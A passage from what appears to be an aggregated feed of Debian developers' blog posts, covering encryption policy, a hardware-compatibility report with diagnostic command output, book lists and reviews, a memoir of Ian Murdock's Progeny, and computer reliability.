Features Google Chrome has a feature to not run plugins unless specifically permitted. This requires a couple of extra mouse actions when watching a TV program on the Internet but prevents random web sites from using Flash and Java which are two of the most common vectors of attack. Chrome also has a feature to check a web site against a Google black list before connecting. When I was running a medium size mail server I often had to determine whether URLs being sent out by customers were legitimate or spam, if a user sent out a URL that s on Google s blacklist I would lock their account without doing any further checks. Conclusion I think that even among Linux users (who tend to be more careful about security than users of other OSs) using a separate PC and booting from a CD/DVD will generally be regarded as too much effort. Running a full featured web browser like Google Chrome and updating it whenever a new version is released will avoid most problems. Using wget when you have to reason to be concerned is a possibility, but not only is it slightly inconvenient but it also often won t download the content that you want (EG in the case of HTML frames).

16 April 2016

Scott Kitterman: Future of secure systems in the US

As a rule, I avoid writing publicly on political topics, but I m making an exception. In case you haven t been following it, the senior Republican and the senior Democrat on the Senate Intelligence Committee recently announced a legislative proposal misleadingly called the Compliance with Court Orders Act of 2016. The full text of the draft can be found here. It would effectively ban devices and software in the United States that the manufacturer cannot retrieve data from. Here is a good analysis of the breadth of the proposal and a good analysis of the bill itself. While complying with court orders might sound great in theory, in practice this means these devices and software will be insecure by design. While that s probably reasonably obvious to most normal readers here, don t just take my word for it, take Bruce Schneier s. In my opinion, policy makers (and it s not just in the United States) are suffering from a perception gap about security and how technically hard it is to get right. It seems to me that they are convinced that technologists could just do security right while still allowing some level of extraordinary access for law enforcement if they only wanted to. We ve tried this before and the story never seems to end well. This isn t a complaint from wide eyed radicals that such extraordinary access is morally wrong or inappropriate. It s hard core technologists saying it can t be done. I don t know how to get the message across. Here s President Obama, in my opinion, completely missing the point when he equates a desire for security with fetishizing our phones above every other value. Here are some very smart people trying very hard to be reasonable about some mythical middle ground. As Riana Pfefferkorn s analysis that I linked in the first paragraph discusses, this middle ground doesn t exist and all the arm waving in the world by policy makers won t create it. Coincidentally, this same week, the White House announced a new Commission on Enhancing National Cybersecurity . Cybersecurity is certainly something we could use more of, unfortunately Congress seems to be heading off in the opposite direction and no one from the executive branch has spoken out against it. Security and privacy are important to many people. Given the personal and financial importance of data stored in computers (traditional or mobile), users don t want criminals to get a hold of it. Companies know this, which is why both Apple IOS and Google Android both encrypt their local file systems by default now. If a bill anything like what s been proposed becomes law, users that care about security are going to go elsewhere. That may end up being non-US companies products or US companies may shift operations to localities more friendly to secure design. Either way, the US tech sector loses. A more accurate title would have been Technology Jobs Off-Shoring Act of 2016. EDIT: Fixed a typo.

10 April 2016

Russ Allbery: Largish haul

Let's see if I can scrounge through all of my now-organized directories of ebooks and figure out what I haven't recorded here yet. At least the paper books make that relatively easy, since I don't shelve them until I post them. (Yeah, yeah, I should actually make a database.) Hugh Aldersey-Williams Periodic Tales (nonfiction)
Sandra Ulbrich Almazan SF Women A-Z (nonfiction)
Radley Balko Rise of the Warrior Cop (nonfiction)
Peter V. Brett The Warded Man (sff)
Lois McMaster Bujold Gentleman Jole and the Red Queen (sff)
Fred Clark The Anti-Christ Handbook Vol. 2 (nonfiction)
Dave Duncan West of January (sff)
Karl Fogel Producing Open Source Software (nonfiction)
Philip Gourevitch We Wish to Inform You That Tomorrow We Will Be Killed With Our Families (nonfiction)
Andrew Groen Empires of EVE (nonfiction)
John Harris @ Play (nonfiction)
David Hellman & Tevis Thompson Second Quest (graphic novel)
M.C.A. Hogarth Earthrise (sff)
S.L. Huang An Examination of Collegial Dynamics... (sff)
S.L. Huang & Kurt Hunt Up and Coming (sff anthology)
Kameron Hurley Infidel (sff)
Kevin Jackson-Mead & J. Robinson Wheeler IF Theory Reader (nonfiction)
Rosemary Kirstein The Lost Steersman (sff)
Rosemary Kirstein The Language of Power (sff)
Merritt Kopas Videogames for Humans (nonfiction)
Alisa Krasnostein & Alexandra Pierce (ed.) Letters to Tiptree (nonfiction)
Mathew Kumar Exp. Negatives (nonfiction)
Ken Liu The Grace of Kings (sff)
Susan MacGregor The Tattooed Witch (sff)
Helen Marshall Gifts for the One Who Comes After (sff collection)
Jack McDevitt Coming Home (sff)
Seanan McGuire A Red-Rose Chain (sff)
Seanan McGuire Velveteen vs. The Multiverse (sff)
Seanan McGuire The Winter Long (sff)
Marc Miller Agent of the Imperium (sff)
Randal Munroe Thing Explainer (graphic nonfiction)
Marguerite Reed Archangel (sff)
J.K. Rowling Harry Potter: The Complete Collection (sff)
K.J. Russell Tides of Possibility (sff anthology)
Robert J. Sawyer Starplex (sff)
Bruce Schneier Secrets & Lies (nonfiction)
Mike Selinker (ed.) The Kobold Game to Board Game Design (nonfiction)
Douglas Smith Chimerascope (sff collection)
Jonathan Strahan Fearsome Journeys (sff anthology)
Nick Suttner Shadow of the Colossus (nonfiction)
Aaron Swartz The Boy Who Could Change the World (essays)
Caitlin Sweet The Pattern Scars (sff)
John Szczepaniak The Untold History of Japanese Game Developers I (nonfiction)
John Szczepaniak The Untold History of Japanese Game Developers II (nonfiction)
Jeffrey Toobin The Run of His Life (nonfiction)
Hayden Trenholm Blood and Water (sff anthology)
Coen Teulings & Richard Baldwin (ed.) Secular Stagnation (nonfiction)
Ursula Vernon Book of the Wombat 2015 (graphic nonfiction)
Ursula Vernon Digger (graphic novel) Phew, that was a ton of stuff. A bunch of these were from two large StoryBundle bundles, which is a great source of cheap DRM-free ebooks, although still rather hit and miss. There's a lot of just fairly random stuff that's been accumulating for a while, even though I've not had a chance to read very much. Vacation upcoming, which will be a nice time to catch up on reading.

4 January 2016

John Goerzen: Hiking a mountain with Ian Murdock

Would you like to hike a mountain? That question caught me by surprise. It was early in 2000, and I had flown to Tucson for a job interview. Ian Murdock was starting a new company, Progeny, and I was being interviewed for their first hire. Well, I thought, hiking will be fun. So we rode a bus or something to the top of the mountain and then hiked down. Our hike was full of well, everything. Ian talked about Tucson and the mountains, about his time as the Debian project leader, about his college days. I asked about the plants and such we were walking past. We talked about the plans for Progeny, my background, how I might fit in. It was part interview, part hike, part two geeks chatting. Ian had no HR telling him you can t go hiking down a mountain with a job candidate, as I m sure HR would have. And I am glad of it, because even 16 years later, that is still by far the best time I ever had at a job interview, despite the fact that it ruined the only pair of shoes I had brought along I had foolishly brought dress shoes for a, well, job interview. I guess it worked, too, because I was hired. Ian wanted to start up the company in Indianapolis, so over the next little while there was the busy work of moving myself and setting up an office. I remember those early days Ian and I went computer shopping at a local shop more than once to get the first workstations and servers for the company. Somehow he had found a deal on some office space in a high-rent office building. I still remember the puzzlement on the faces of accountants and lawyers dressed up in suits riding in the elevators with us in our shorts and sandals, or tie-die, next to them. Progeny s story was to be a complicated one. We set out to rock the world. We didn t. We didn t set out to make lasting friendships, but we often did. We set out to accomplish great things, and we did some of that, too. We experienced a full range of emotions there elation when we got hardware auto-detection working well or when our downloads looked very popular, despair when our funding didn t come through as we had hoped, being lost when our strategy had to change multiple times. And, as is the case everywhere, none of us were perfect. I still remember the excitement after we published our first release on the Internet. Our little server that could got pegged at 100Mb of outbound bandwidth (that was something for a small company in those days.) The moment must have meant something, because I still have the mrtg chart from that day on my computer, 15 years later. Progeny's Bandwidth Chart We made a good Linux distribution, an excellent Debian derivative, but commercial success did not flow from it. In the succeeding months, Ian and the company tried hard to find a strategy that would stick and make our big break. But that never happened. We had several rounds of layoffs when hoped-for funding never materialized. Ian eventually lost control of the company, and despite a few years of Itanium contract work after I left, closed for good. Looking back, Progeny was life compressed. During the good times, we had joy, sense of accomplishment, a sense of purpose at doing something well that was worth doing. I had what was my dream job back then: working on Debian as I loved to do, making the world a better place through Free Software, and getting paid to do it. And during the bad times, different people at Progeny experienced anger, cynicism, apathy, sorrow for the loss of our friends or plans, or simply a feeling to soldier on. All of the emotions, good or bad, were warranted in their own way. Bruce Byfield, one of my co-workers at Progeny, recently wrote a wonderful memoriam of Ian. He wrote, More than anything, he wanted to repeat his accomplishment with Debian, and, naturally he wondered if he could live up to his own expectations of himself. That, I think, was Ian s personal tragedy that he had succeeded early in life, and nothing else he did with his life could quite measure up to his expectations and memories. Ian was not the only one to have some guilt over Progeny. I, for years, wondered if I should have done more for the company, could have saved things by doing something more, or different. But I always came back to the conclusion I had at the time: that there was nothing I could do a terribly sad realization. In the years since, I watched Ubuntu take the mantle of easy-to-install Debian derivative. I saw them reprise some of the ideas we had, and even some of our mistakes. But by that time, Progeny was so thoroughly forgotten that I doubt they even realized they were doing it. I had long looked at our work at Progeny as a failure. Our main goal was never accomplished, our big product never sold many copies, our company eventually shuttered, our rock-the-world plan crumpled and forgotten. And by those traditional measurements, you could say it was a failure. But I have come to learn in the years since that success is a lot more that those things. Success is also about finding meaning and purpose through our work. As a programmer, success is nailing that algorithm that lets the application scale 10x more than before, or solving that difficult problem. As a manager, success is helping team members thrive, watching pieces come together on projects that no one person could ever do themselves. And as a person, success comes from learning from our experiences, and especially our mistakes. As J. Michael Straczynski wrote in a Babylon 5 episode, loosely paraphrased: Maybe this experience will be a good lesson. Too bad it was so painful, but there ain t no other kind. The thing about Progeny is this Ian built a group of people that wanted to change the world for the better. We gave it our all. And there s nothing wrong with that. Progeny did change the world. As us Progeny alumni have scattered around the country, we benefit from the lessons we learned there. And many of us were different , sort of out of place before Progeny, and there we found others that loved C compilers, bootloaders, and GPL licenses just as much as we did. We belonged, not just online but in life, and we went on to pull confidence and skill out of our experience at Progeny and use them in all sorts of ways over the years. And so did Ian. Who could have imagined the founder of Debian and Progeny would one day lead the cause of an old-guard Unix turning Open Source? I run ZFS on my Debian system today, and Ian is partly responsible for that and his time at Progeny is too. So I can remember Ian, and Progeny, as a success. And I leave you with a photo of my best memento from the time there: an original unopened boxed copy of Progeny Linux. IMG_6197_v1

13 December 2015

Robert Edmonds: Works with Debian: Intel SSD 750, AMD FirePro W4100, Dell P2715Q

I recently installed new hardware in my primary computer running Debian unstable. The disk used for the / and /home filesystem was replaced with an Intel SSD 750 series NVM Express card. The graphics card was replaced by an AMD FirePro W4100 card, and two Dell P2715Q monitors were installed. Intel SSD 750 series NVM Express card This is an 800 GB SSD on a PCI-Express x4 card (model number SSDPEDMW800G4X1) using the relatively new NVM Express interface, which appears as a /dev/nvme* device. The stretch alpha 4 Debian installer was able to detect and install onto this device, but grub-installer 1.127 on the installer media was unable to install the boot loader. This was due to a bug recently fixed in 1.128:
grub-installer (1.128) unstable; urgency=high
  * Fix buggy /dev/nvme matching in the case statement to determine
    disc_offered_devfs (Closes: #799119). Thanks, Mario Limonciello!
 -- Cyril Brulebois <kibi@debian.org>  Thu, 03 Dec 2015 00:26:42 +0100
I was able to download and install the updated .udeb by hand in the installer environment and complete the installation. This card was installed on a Supermicro X10SAE motherboard, and the UEFI BIOS was able to boot Debian directly from the NVMe card, although I updated to the latest available BIOS firmware prior to the installation. It appears in lspci like this:
02:00.0 Non-Volatile memory controller: Intel Corporation PCIe Data Center SSD (rev 01)
(prog-if 02 [NVM Express])
    Subsystem: Intel Corporation SSD 750 Series [Add-in Card]
    Flags: bus master, fast devsel, latency 0
    Memory at f7d10000 (64-bit, non-prefetchable) [size=16K]
    Expansion ROM at f7d00000 [disabled] [size=64K]
    Capabilities: [40] Power Management version 3
    Capabilities: [50] MSI-X: Enable+ Count=32 Masked-
    Capabilities: [60] Express Endpoint, MSI 00
    Capabilities: [100] Advanced Error Reporting
    Capabilities: [150] Virtual Channel
    Capabilities: [180] Power Budgeting <?>
    Capabilities: [190] Alternative Routing-ID Interpretation (ARI)
    Capabilities: [270] Device Serial Number 55-cd-2e-41-4c-90-a8-97
    Capabilities: [2a0] #19
    Kernel driver in use: nvme
The card itself appears very large in marketing photos, but this is a visual trick: the photographs are taken with the low-profile PCI bracket installed, rather than the standard height PCI bracket which it ships installed with. smartmontools fails to read SMART data from the drive, although it is still able to retrieve basic device information, including the temperature:
root@chase 0 :~# smartctl -d scsi -a /dev/nvme0n1
smartctl 6.4 2015-06-04 r4109 [x86_64-linux-4.3.0-trunk-amd64] (local build)
Copyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org
=== START OF INFORMATION SECTION ===
Vendor:               NVMe
Product:              INTEL SSDPEDMW80
Revision:             0135
Compliance:           SPC-4
User Capacity:        800,166,076,416 bytes [800 GB]
Logical block size:   512 bytes
Rotation Rate:        Solid State Device
Logical Unit id:      8086INTEL SSDPEDMW800G4                     1000CVCQ531500K2800EGN  
Serial number:        CVCQ531500K2800EGN
Device type:          disk
Local Time is:        Sun Dec 13 01:48:37 2015 EST
SMART support is:     Unavailable - device lacks SMART capability.
=== START OF READ SMART DATA SECTION ===
Current Drive Temperature:     31 C
Drive Trip Temperature:        85 C
Error Counter logging not supported
[GLTSD (Global Logging Target Save Disable) set. Enable Save with '-S on']
Device does not support Self Test logging
root@chase 4 :~# 
Simple tests with cat /dev/nvme0n1 >/dev/null and iotop show that the card can read data at about 1 GB/sec, about twice as fast as the SATA-based SSD that it replaced. apt/dpkg now run about as fast on the NVMe SSD as they do on a tmpfs. Hopefully this device doesn't at some point require updated firmware, like some infamous SSDs have. AMD FirePro W4100 graphics card This is a graphics card capable of driving multiple DisplayPort displays at "4K" resolution and at a 60 Hz refresh rate. It has four Mini DisplayPort connectors, although I only use two of them. It was difficult to find a sensible graphics card. Most discrete graphics cards appear to be marketed towards video gamers who apparently must seek out bulky cards that occupy multiple PCI slots and have excessive cooling devices. (To take a random example, the ASUS STRIX R9 390X has three fans and brags about its "Mega Heatpipes".) AMD markets a separate line of "FirePro" graphics cards intended for professionals rather than gamers, although they appear to be based on the same GPUs as their "Radeon" video cards. The AMD FirePro W4100 is a normal half-height PCI-E card that fits into a single PCI slot and has a relatively small cooler with a single fan. It doesn't even require an auxilliary power connection and is about the same dimensions as older video cards that I've successfully used with Debian. It was difficult to determine whether the W4100 card was actually supported by an open source driver before buying it. The word "FirePro" appears nowhere on the webpage for the X.org Radeon driver, but I was able to find a "CAPE VERDE" listed as an engineering name which appears to match the "Cape Verde" code name for the FirePro W4100 given on Wikipedia's List of AMD graphics processing units. This explains the "verde" string that appears in the firmware filenames requested by the kernel (available only in the non-free/firmware-amd-graphics package):
[drm] initializing kernel modesetting (VERDE 0x1002:0x682C 0x1002:0x2B1E).
[drm] Loading verde Microcode
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_pfp.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_me.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_ce.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_rlc.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_mc.bin
radeon 0000:01:00.0: firmware: direct-loading firmware radeon/verde_smc.bin
The card appears in lspci like this:
01:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Cape Verde GL [FirePro W4100]
(prog-if 00 [VGA controller])
    Subsystem: Advanced Micro Devices, Inc. [AMD/ATI] Device 2b1e
    Flags: bus master, fast devsel, latency 0, IRQ 55
    Memory at e0000000 (64-bit, prefetchable) [size=256M]
    Memory at f7e00000 (64-bit, non-prefetchable) [size=256K]
    I/O ports at e000 [size=256]
    Expansion ROM at f7e40000 [disabled] [size=128K]
    Capabilities: [48] Vendor Specific Information: Len=08 <?>
    Capabilities: [50] Power Management version 3
    Capabilities: [58] Express Legacy Endpoint, MSI 00
    Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+
    Capabilities: [100] Vendor Specific Information: ID=0001 Rev=1 Len=010 <?>
    Capabilities: [150] Advanced Error Reporting
    Capabilities: [200] #15
    Capabilities: [270] #19
    Kernel driver in use: radeon
The W4100 appears to work just fine, except for a few bizarre error messages that are printed to the kernel log when the displays are woken from power saving mode:
[Sun Dec 13 00:24:41 2015] [drm:si_dpm_set_power_state [radeon]] *ERROR* si_enable_smc_cac failed
[Sun Dec 13 00:24:41 2015] [drm:si_dpm_set_power_state [radeon]] *ERROR* si_enable_smc_cac failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* displayport link status failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* clock recovery failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* displayport link status failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* clock recovery failed
[Sun Dec 13 00:24:41 2015] [drm:si_dpm_set_power_state [radeon]] *ERROR* si_enable_smc_cac failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* displayport link status failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* clock recovery failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* displayport link status failed
[Sun Dec 13 00:24:41 2015] [drm:radeon_dp_link_train [radeon]] *ERROR* clock recovery failed
There don't appear to be any ill effects from these error messages, though. I have the following package versions installed:
 / Name                          Version             Description
+++-=============================-===================-================================================
ii  firmware-amd-graphics         20151207-1          Binary firmware for AMD/ATI graphics chips
ii  linux-image-4.3.0-trunk-amd64 4.3-1~exp2          Linux 4.3 for 64-bit PCs
ii  xserver-xorg-video-radeon     1:7.6.1-1           X.Org X server -- AMD/ATI Radeon display driver
The Supermicro X10SAE motherboard has two PCI-E 3.0 slots, but they're listed as functioning in either "16/NA" or "8/8" mode, which apparently means that putting anything in the second slot (like the Intel 750 SSD, which uses an x4 link) causes the video card to run at a smaller x8 link width. This can be verified by looking at the widths reported in the "LnkCap" and "LnkSta" lines in the lspci -vv output:
root@chase 0 :~# lspci -vv -s 01:00.0   egrep '(LnkCap LnkSta):'
        LnkCap: Port #0, Speed 8GT/s, Width x16, ASPM L0s L1, Exit Latency L0s <64ns, L1 <1us
        LnkSta: Speed 8GT/s, Width x8, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt-
root@chase 0 :~# 
I did not notice any visible artifacts or performance degradation because of the smaller link width. The sensors utility from the lm-sensors package is capable of reporting the temperature of the GPU:
root@chase 0 :~# sensors radeon-pci-0100
radeon-pci-0100
Adapter: PCI adapter
temp1:        +55.0 C  (crit = +120.0 C, hyst = +90.0 C)
root@chase 0 :~# 
Dell P2715Q monitors Two new 27" Dell monitors with a native resolution of 3840x2160 were attached to the new graphics card. They replaced two ten year old Dell 2001FP monitors with a native resolution of 1600x1200 that had experienced burn-in, providing 4.32 times as many pixels. (TV and monitor manufacturers now shamelessly refer to the 3840x2160 resolution as "4K" resolution even though neither dimension reaches 4000 pixels.) There was very little to setup beyond plugging the DisplayPort inputs on these monitors into the DisplayPort outputs on the graphics card. Most of the setup involved reconfiguring software to work with the very high resolution. X.org, for tl;dr CLOSED NOTABUG reasons doesn't set the DPI correctly. These monitors have ~163 DPI resolution, so I added -dpi 168 to /etc/X11/xdm/Xservers. (168 is an even 1.75x multiple of 96.) Software like Google Chrome and xfce4-terminal rendered fonts and graphical elements at the right size, but other software like notion, pidgin, and virt-manager did not fully understand the high DPI. E.g., pidgin renders fonts at the correct size, but icons are too small. The default X cursor was also too small. To fix this, I installed the dmz-cursor-theme package, ran update-alternatives --config x-cursor-theme and selected /usr/share/icons/DMZ-Black/cursor.theme as the cursor theme. Overall, these displays are much brighter and more readable than the ones they replaced.

1 January 2015

Russ Allbery: 2014 Book Reading in Review

This year, after a series of catastrophically horrible and unethical management decisions, I walked away from my job of seventeen years and found a new job. As you might expect, reading wasn't the top priority for much of the year. I'm moderately surprised that I read as much as I did. The good side is that I'm now in a much better place both professionally and personally and no longer have to put up with draining and demoralizing nonsense happening on a regular basis. The downside for my review output is that the new job is more engrossing and is, in some ways, harder work, so I expect my reading totals going forward to stabilize somewhere below where they were in the past (although it's possible that the daily commute will change that equation somewhat). As mentioned last year, I had a feeling that something like this would happen (although not that it would be anywhere near this bad), so I had no specific reading goals for the year. Next year, I'm going to see how it goes for the first few months, and might then consider setting some goals if I want to encourage myself to take more time for reading. The below statistics are confined to the books I reviewed in 2014. I read three more books that I've not yet reviewed, partly because the end of the year isn't as packed with vacation as it was at Stanford. Those will be counted in 2014. Despite the low reading totals for the year, I read two 10 out of 10 books. My favorite book of the year was Ann Leckie's Ancillary Justice, which was one of the best science fiction novels I've ever read. Highly recommended if you like the space opera genre at all. A close second was my favorite non-fiction book of the year and the other 10 out of 10: Allie Brosh's collection Hyperbole and a Half. Those of you who have read her blog already know her brilliant and insightful style of humor. Those who haven't are in for a treat. I read a lot of non-fiction this year and not as much fiction, partly for mood reasons, so I don't have honorable mentions in the fiction department. In the non-fiction department, though, there are four more books worth mentioning. Cryptography Engineering, by Niels Ferguson, Bruce Schneier, and Tadayoshi Kohno, was the best technical book that I read last year, and a must-read for anyone who works on security or crypto software. David Graeber's Debt was the best political and economic book of the year and the book from which I learned the most. It changed the way that you think about debt and loans significantly. A close second, though, was David Roodman's Due Diligence, which is a must-read for anyone who has considered investing in microfinance or is curious about the phenomenon. We need more data-driven, thoughtful, book-length analysis like this in the world. Finally, The Knowledge, by Lewis Dartnell, is an entertaining and quixotic project. The stated goal of the book is to document the information required to rebuild civilization after a catastrophe, with hopefully fewer false starts and difficult research than was required the first time. I'm dubious about its usefulness for that goal, but it's a fascinating and entertaining book in its own right, full of detail about industrial processes and the history of manufacturing and construction that are otherwise hard to come by without extensive (and boring) research. Recommended, even if you're dubious about the efficacy of the project. The full analysis includes some additional personal reading statistics, probably only of interest to me.

29 August 2014

Jakub Wilk: More spell-checking

Have you ever wanted to use Lintian's spell-checker against arbitrary files? Now you can do it with spellintian:
$ zrun spellintian --picky /usr/share/doc/RFC/best-current-practice/rfc*
/tmp/0qgJD1Xa1Y-rfc1917.txt: amoung -> among
/tmp/kvZtN435CE-rfc3155.txt: transfered -> transferred
/tmp/o093khYE09-rfc3481.txt: unecessary -> unnecessary
/tmp/4P0ux2cZWK-rfc6365.txt: charater -> character
mwic (Misspelled Words In Context) takes a different approach. It uses classic spell-checking libraries (via Enchant), but it groups misspellings and shows them in their contexts. That way you can quickly filter out false-positives, which are very common in technical texts, using visual grep:
$ zrun mwic /usr/share/doc/debian/social-contract.txt.gz
DFSG:
   an Free Software Guidelines (DFSG)
   an Free Software Guidelines (DFSG) part of the
                                ^^^^
Perens:
     Bruce Perens later removed the Debian-spe 
  by Bruce Perens, refined by the other Debian 
           ^^^^^^
Ean, Schuessler:
  community" was suggested by Ean Schuessler. This document was drafted
                              ^^^ ^^^^^^^^^^
GPL:
  The "GPL", "BSD", and "Artistic" lice 
       ^^^
contrib:
  created "contrib" and "non-free" areas in our 
           ^^^^^^^
CDs:
  their CDs. Thus, although non-free wor 
        ^^^

11 July 2014

Russell Coker: Improving Computer Reliability

In a comment on my post about Taxing Inferior Products [1] Ben pointed out that most crashes are due to software bugs. Both Ben and I work on the Debian project and have had significant experience of software causing system crashes for Debian users. But I still think that the widespread adoption of ECC RAM is a good first step towards improving the reliability of the computing infrastructure. Currently when software developers receive bug reports they always wonder whether the bug was caused by defective hardware. So when bugs can t be reproduced (or can t be reproduced in a way that matches the bug report) they often get put in a list of random crash reports and no further attention is paid to them. When a system has ECC RAM and a filesystem that uses checksums for all data and metadata we can have greater confidence that random bugs aren t due to hardware problems. For example if a user reports a file corruption bug they can t repeat that occurred when using the Ext3 filesystem on a typical desktop PC I ll wonder about the reliability of storage and RAM in their system. If however the same bug report came from someone who had ECC RAM and used the ZFS filesystem then I would be more likely to consider it a software bug. The current situation is that every part of a typical PC is unreliable. When a bug can be attributed to one of several pieces of hardware, the OS kernel and even malware (in the case of MS Windows) it s hard to know where to start in tracking down a bug. Most users have given up and accepted that crashing periodically is just what computers do. Even experienced Linux users sometimes give up on trying to track down bugs properly because it s sometimes very difficult to file a good bug report. For the typical computer user (who doesn t have the power that a skilled Linux user has) it s much worse, filing a bug report seems about as useful as praying. One of the features of ECC RAM is that the motherboard can inform the user (either at boot time, after a NMI reboot, or through system diagnostics) of the problem so it can be fixed. A feature of filesystems such as ZFS and BTRFS is that they can inform the user of drive corruption problems, sometimes before any data is lost. My recommendation of BTRFS in regard to system integrity does have a significant caveat, currently the system reliability decrease due to crashes outweighs the reliability increase due to checksums at this time. This isn t all bad because at least when BTRFS crashes you know what the problem is, and BTRFS is rapidly improving in this regard. When I discuss BTRFS in posts like this one I m considering the theoretical issues related to the design not the practical issues of software bugs. That said I ve twice had a BTRFS filesystem seriously corrupted by a faulty DIMM on a system without ECC RAM.

7 June 2014

Tim Retout: Day of Action

Today I attended the Don't Spy On Us campaign's Day Of Action at Shoreditch Town Hall in London. I'm not sure how much actual action there was, but the talking was interesting. Retrospective Day of Action drinking game: drink every time you hear the phrase "If you have nothing to hide, you have nothing to fear." The spooks have a really good marketing department. I don't write a lot on the internet any more - something I regret, actually. It can't even be because there are alternative places I am writing, because over the last couple of years I have been closing most of my social media accounts. I just share much less of myself online. On the internet, nothing is ephemeral. Bruce Schneier says so. Choose your words carefully. The thing about blogging is that it's so public. It's often tied to the writer's real-life identity. One of the valuable things about social media services is that they supposedly let you restrict who can read your words - the trade-off being that you must also grant access to advertisers, spies, cybercriminals... Most memorable moments of the day: In general, there were lots of famous people walking around as if they were normal. I was in the same room as Cory Doctorow, Jimmy Wales and Bruce Schneier at the same time. Ahem, action (mostly for UK citizens):

12 April 2014

Russ Allbery: Review: Cryptography Engineering

Review: Cryptography Engineering, by Niels Ferguson, et al.
Publisher: Wiley
Copyright: 2010
ISBN: 0-470-47424-6
Format: Kindle
Pages: 384
Subtitled Design Principles and Practical Applications, Cryptography Engineering is intended as an overview and introduction to cryptography for the non-expert. It doesn't dive deeply into the math, although there is still a fairly thorough mathematical introduction to public-key cryptography. Instead, it focuses on the principles, tools, and algorithms that are the most concretely useful to a practitioner who is trying to design secure systems rather than doing theoretical cryptography. The "et al." in the author summary hides Bruce Schneier and Tadayoshi Kohno, and this book is officially the second edition of Practical Cryptography by Ferguson and Schneier. Schneier's name will be familiar from, among other things, Applied Cryptography, and I'll have more to say later about which of the two books one should read (and the merits of reading both). But one of the immediately-apparent advantages of Cryptography Engineering is that it's recent. Its 2010 publication date means that it recommends AES as a block cipher, discusses MD5 weaknesses, and can discuss and recommend SHA-2. For the reader whose concern with cryptography is primarily "what should I use now for new work," this has huge benefit. "What should I use for new work" is the primary focus of this book. There is some survey of the field, but that survey is very limited compared to Applied Cryptography and is tightly focused on the algorithms and approaches that one might reasonably propose today. Cryptography Engineering also attempts to provide general principles and simplifying assumptions to steer readers away from trouble. One example, and the guiding principle for much of the book, is that any new system needs at least a 128-bit security level, meaning that any attack will require 2128 steps. This requirement may be overkill in some edge cases, as the authors point out, but when one is not a cryptography expert, accepting lower security by arguments that sound plausible but may not be sound is very risky. Cryptography Engineering starts with an overview of cryptography, the basic tools of cryptographic analysis, and the issues around designing secure systems and protocols. I like that the authors not only make it clear that security programming is hard but provide a wealth of practical examples of different attack methods and failure modes, a theme they continue throughout the book. From there, the book moves into a general discussion of major cryptographic areas: encryption, authentication, public-key cryptography, digital signatures, PKI, and issues of performance and complexity. Part two starts the in-depth discussion with chapters on block ciphers, block cipher modes, hash functions, and MACs, which together form part two (message security). The block cipher mode discussion is particularly good and includes algorithms newer than those in Applied Cryptography. This part closes with a walkthrough of constructing a secure channel, in pseudocode, and a chapter on implementation issues. The implementation chapters throughout the book are necessarily more general, but for me they were one of the most useful parts of the book, since they take a step back from the algorithms and look at the perils and pitfalls of using them to do real work. The third part of the book is on key negotiation and encompasses random numbers, prime numbers, Diffie-Hellman, RSA, a high-level look at cryptographic protocols, and a detailed look at key negotiation. This will probably be the hardest part of the book for a lot of readers, since the introduction to public-key is very heavy on math. The authors feel that's unavoidable to gain any understanding of the security risks and attack methods against public-key. I'm not quite convinced. But it's useful information, if heavy going that requires some devoted attention. I want to particularly call out the chapter on random numbers, though. This is an often-overlooked area in cryptography, particularly in introductions for the non-expert, and this is the best discussion of pseudo-random number generators I've ever seen. The authors walk through the design of Fortuna as an illustration of the issues and how they can be avoided. I came away with a far better understanding of practical PRNG design than I've ever had (and more sympathy for the annoying OpenSSL ~/.rnd file). The last substantial part of the book is on key management, starting with a discussion of time and its importance in cryptographic protocols. From there, there's a discussion of central trusted key servers and then a much more comprehensive discussion of PKI, including the problems with revocation, key lifetime, key formats, and keeping keys secure. The concluding chapter of this part is a very useful discussion of key storage, which is broad enough to encompass passwords, biometrics, and secure tokens. This is followed by a short part discussing standards, patents, and experts. A comparison between this book and Applied Cryptography reveals less attention to the details of cryptographic algorithms (apart from random number generators, where Cryptography Engineering provides considerably more useful information), wide-ranging surveys of algorithms, and underlying mathematics. Cryptography Engineering also makes several interesting narrowing choices, such as skipping stream ciphers almost entirely. Less surprisingly, this book covers only a tiny handful of cryptographic protocols; there's nothing here about zero-knowledge proofs, blind signatures, bit commitment, or even secret sharing, except a few passing mentions. That's realistic: those protocols are often extremely difficult to understand, and the typical security system doesn't use them. Replacing those topics is considerably more discussion of implementation techniques and pitfalls, including more assistance from the authors on how to choose good cryptographic building blocks and how to combine them into useful systems. This is a difficult topic, as they frequently acknowledge, and a lot of the advice is necessarily fuzzy, but they at least provide an orientation. To get much out of Applied Cryptography, you needed a basic understanding of what cryptography can do and how you want to use it. Cryptography Engineering tries to fill in that gap to the point where any experienced programmer should be able to see what problems cryptography can solve (and which it can't). That brings me back to the question of which book you should read, and a clear answer: start here, with Cryptography Engineering. It's more recent, which means that the algorithms it discusses are more directly applicable to day-to-day work. The block cipher mode and random number generator chapters are particularly useful, even if, for the latter, one will probably use a standard library. And it takes more firm stands, rather than just surveying. This comes with the risk of general principles that aren't correct in specific situations, but I think for most readers the additional guidance is vital. That said, I'm still glad I read Applied Cryptography, and I think I would still recommend reading it after this book. The detailed analysis of DES in Applied Cryptography is worth the book by itself, and more generally the survey of algorithms is useful in showing the range of approaches that can be used. And the survey of cryptographic protocols, if very difficult reading, provides tools for implementing (or at least understanding) some of the fancier and more cutting-edge things that one can do 